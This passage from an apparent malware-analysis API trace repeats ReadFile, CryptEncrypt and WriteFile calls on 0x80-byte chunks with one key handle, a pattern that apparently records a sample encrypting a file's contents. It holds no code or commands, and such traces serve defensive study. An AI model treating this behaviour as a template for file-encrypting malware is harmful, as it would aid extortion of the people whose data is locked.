pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.282] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.282] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.283] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.283] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.283] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.284] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.284] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.284] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.285] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.285] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.285] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.285] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.285] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.285] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.285] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.285] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.285] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.285] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.285] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.285] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.287] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.287] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.288] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.288] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.288] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, 